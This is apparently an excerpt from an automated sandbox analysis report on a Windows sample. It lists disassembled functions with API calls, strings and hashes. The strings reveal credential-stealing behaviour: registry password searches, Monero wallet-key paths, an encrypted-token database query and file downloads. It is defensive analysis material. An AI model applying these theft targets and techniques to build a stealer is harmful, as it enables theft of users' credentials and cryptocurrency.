                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 4c0ccf9d674edcbf0786bc22dc5ec5b6a666e20008b70abe15ed292d6334d27b
                                  • Instruction ID: d04fc82cd47a28be208c7d8af9916ba00103d4645146596f7587ba9b17b99319
                                  • Opcode Fuzzy Hash: 4c0ccf9d674edcbf0786bc22dc5ec5b6a666e20008b70abe15ed292d6334d27b
                                  • Instruction Fuzzy Hash: CC315E72A04109DFCB18EBB4EC85DFE73B5BB58301F205159F182B7685DB39A946CBA0
                                  Function 00E472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00E47314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E4733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E473B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E4740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E47452
                                  • HeapFree.KERNEL32(00000000), ref: 00E47459
                                  • task.LIBCPMTD ref: 00E47555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: dbe792696b0a2d34276538320fe9763bc055f9a9182043f23bc090d45cbdcaee
                                  • Instruction ID: 2830f007a2674ce04edd878dd3a985c4bb659214a106a30219460febc49d2b13
                                  • Opcode Fuzzy Hash: dbe792696b0a2d34276538320fe9763bc055f9a9182043f23bc090d45cbdcaee
                                  • Instruction Fuzzy Hash: 93613CB5D141689BDB24DB50EC41BEEB7B8BF44304F0091E9E689B6141DBB45BC9CFA0
                                  Function 00E58100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01CBEAB0,00000000,?,00E60E2C,00000000,?,00000000), ref: 00E58130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E58158
                                  • __aulldiv.LIBCMT ref: 00E58172
                                  • __aulldiv.LIBCMT ref: 00E58180
                                  • wsprintfA.USER32 ref: 00E581AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: e87f1c9bf57c55f07046b321f6b0019a01abd4c0117bdd869229239e84f6bbb0
                                  • Instruction ID: a12585117aef33e31e3a5c2d44a0db7ae24781886d869ede25137dc35d081777
                                  • Opcode Fuzzy Hash: e87f1c9bf57c55f07046b321f6b0019a01abd4c0117bdd869229239e84f6bbb0
                                  • Instruction Fuzzy Hash: F9214AB1E48218ABDB10DFD4CD49FAFB7B8FB44B15F104609FA05BB280D77969058BA4
                                  Function 00E460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                  • InternetOpenA.WININET(00E60DF7,00000001,00000000,00000000,00000000), ref: 00E4610F
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E4618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E461B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00E461DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E4620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00E46249
                                  • InternetCloseHandle.WININET(?), ref: 00E46253
                                  • InternetCloseHandle.WININET(00000000), ref: 00E46260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 0e2a4f6750212ca7e0e644df8b158d42b76deff604b0f28d38298ec5832471ea
                                  • Instruction ID: 6b19377e1690c3e63a84ed5b20e026d6c4074a8be86fc4f2a73861bab270df9e
                                  • Opcode Fuzzy Hash: 0e2a4f6750212ca7e0e644df8b158d42b76deff604b0f28d38298ec5832471ea
                                  • Instruction Fuzzy Hash: AC51C4B1A00208EBDB20DF60DC49BEE77B8FB04305F005599B646B71C0DBB56A89CF55
                                  Function 00E4BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BC9F
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E4BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00E4BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 7a532aa6652b0129b622579ec2823c1b557f016f4ff685518084b43790913856
                                  • Instruction ID: b2e6c6c4e17535f85d175078462aff674ba10b7dd0b61304de56034b7966ce2d
                                  • Opcode Fuzzy Hash: 7a532aa6652b0129b622579ec2823c1b557f016f4ff685518084b43790913856
                                  • Instruction Fuzzy Hash: B4B162729101189BCB18FBA0DC56EEE73B8BF54301F445A69F903B2191EF346A4DCB62
                                  Function 00E56770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 74ea828c5b05f5017453383e29f0d55a282deaac5ade7db90c5b495d89c6ed5b
                                  • Instruction ID: 491149478f94e15057e11483a0a35681c0f4a8ba28ce086ddd8288e77f56645c
                                  • Opcode Fuzzy Hash: 74ea828c5b05f5017453383e29f0d55a282deaac5ade7db90c5b495d89c6ed5b
                                  • Instruction Fuzzy Hash: C3F05430A08209EFD354AFE0E90972C7B70FB08707F04019AE68697684DA7D4B41AB95
                                  Function 00E44FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E44FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E44FD1
                                  • InternetOpenA.WININET(00E60DDF,00000000,00000000,00000000,00000000), ref: 00E44FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E45011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E45041
                                  • InternetCloseHandle.WININET(?), ref: 00E450B9
                                  • InternetCloseHandle.WININET(?), ref: 00E450C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 3fe5610eee9b9150c733d84061fb1665ed2da6ef4dbd72997cef8640e19f95dd
                                  • Instruction ID: a5cb0b09b67956c142c2a61f8b91c42de8940d18bff61df096fe033a78abbd5f
                                  • Opcode Fuzzy Hash: 3fe5610eee9b9150c733d84061fb1665ed2da6ef4dbd72997cef8640e19f95dd
                                  • Instruction Fuzzy Hash: 463114B5A00218EBDB20DF54DC85BDDB7B4FB48704F1081E9EA49B7281C7746E858FA8
                                  Function 00E583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E58426
                                  • wsprintfA.USER32 ref: 00E58459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58499
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEAF8,00000000,000F003F,?,00000400), ref: 00E584EC
                                  • lstrlen.KERNEL32(?), ref: 00E58501
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEA98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E60B34), ref: 00E58599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E58608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E5861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 155b3b1169b80d12a78dde044794e0521c7668e609bafcb62aa6ce29dcf92111
                                  • Instruction ID: 2a63cef6d6a3d6a48dffbba46ace228f3c291b4199e4cb1aac583d7c59e85f84
                                  • Opcode Fuzzy Hash: 155b3b1169b80d12a78dde044794e0521c7668e609bafcb62aa6ce29dcf92111
                                  • Instruction Fuzzy Hash: 11215AB1A10218DBDB24DB54DC84FE9B3B8FB48700F00C599E649A7140DF75AA85CFE4
                                  Function 00E57690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E576A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E576AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC720,00000000,00020119,00000000), ref: 00E576DD
                                  • RegQueryValueExA.ADVAPI32(00000000,01CBEB70,00000000,00000000,?,000000FF), ref: 00E576FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E57708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 7fef57b93256625248a5e949a1999672b015fda2fa1ad3e2a5c0e70dca0044f1
                                  • Instruction ID: 6c62bc1faebed9dfbe2ae875f4524a5574476b112b3010c252082a5ab5e7a177
                                  • Opcode Fuzzy Hash: 7fef57b93256625248a5e949a1999672b015fda2fa1ad3e2a5c0e70dca0044f1
                                  • Instruction Fuzzy Hash: F20184B4B08204FBDB10DBE4EC49F6E77B8EB48702F004456FEC5A7284D67999048B60
                                  Function 00E57720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E5773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,01CAC720,00000000,00020119,00E576B9), ref: 00E5775B
                                  • RegQueryValueExA.ADVAPI32(00E576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E5777A
                                  • RegCloseKey.ADVAPI32(00E576B9), ref: 00E57784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 4e1bfa6e4c3c3fda359abbd828539ba7936b6a223a8587a0ca2e7a753f2531c8
                                  • Instruction ID: be26960d5af1bf6b0cd0ab3f797f9595042df5a23211f896b35cda15756bb158
                                  • Opcode Fuzzy Hash: 4e1bfa6e4c3c3fda359abbd828539ba7936b6a223a8587a0ca2e7a753f2531c8
                                  • Instruction Fuzzy Hash: 990167B5B44308FBD710DBE0DC49FAEB7B8FB48701F004555FA85A7285D67555008B60
                                  Function 00E592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
